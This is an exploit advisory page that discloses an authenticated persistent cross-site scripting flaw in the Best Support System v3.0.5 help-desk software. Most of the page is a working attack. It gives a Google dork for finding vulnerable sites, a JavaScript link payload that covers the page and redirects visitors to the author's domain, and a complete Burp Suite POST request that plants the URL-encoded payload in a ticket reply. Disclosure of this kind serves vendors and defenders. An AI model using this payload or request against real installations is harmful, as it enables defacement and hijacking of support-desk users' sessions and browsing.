Best Support System v3.0.5 - Authenticated Persistent XSS

2020.11.12
ru Ex.Mi (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] :: Exploit Title: Best Support System v3.0.5 - Authenticated Persistent XSS [+] :: Google Dork: "Powered By Best Support System" [+] :: Date: 2020-09-15 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Appsbd [ https://appsbd.com ] [+] :: Software Version: 3.0.5 [+] :: Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317 [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.5. [$] :: Payloads: <a href="javascript:alert(`Ex.Mi`);top.location='//ex-mi.ru/';" style="position:fixed !important;z-index:99999;display: flex;align-items: center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important;">Ex.Mi</a> [!] :: PoC (Burp Suite): POST /support-system/ticket-confirm/ticket-reply/4.html HTTP/1.1 Host: demo.appsbd.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 545 Referer: https://demo.appsbd.com/support-system/ticket/details/4.html Cookie: [cookies_here] app_form=8e63e08a7113f03a141ce29e2da6dc21&ticket_body=%3Cp%3E4325%3Cbr%3E%3C%2Fp%3E%3Ca+href%3D%22javascript%3Aalert(%60Ex.Mi%60)%3Btop.location%3D'%2F%2Fex-mi.ru%2F'%3B%22+style%3D%22position%3Afixed+!important%3Bz-index%3A99999%3Bdisplay%3A+flex%3Balign-items%3A+center%3Bjustify-content%3Acenter%3Bwidth%3A100%25%3Bheight%3A100%25%3Bfont-size%3A214px%3Bbackground%3Ablack%3Bcolor%3Alime%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bright%3A0%3Boverflow%3Avisible!important%3B%22%3EEx.Mi%3C%2Fa%3E&status=&app_form_ajax=94e53f7b37b0979c6f6601c11fd42bfb [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex.mi

References:

https://ex-mi.ru/exploit/[2020-09-15]-[PHP]-best-support-system-v3.0.5.txt
https://github.com/ex-mi/ex-mi.github.io/blob/main/exploit/%5B2020-09-15%5D-%5BPHP%5D-best-support-system-v3.0.5.txt
https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top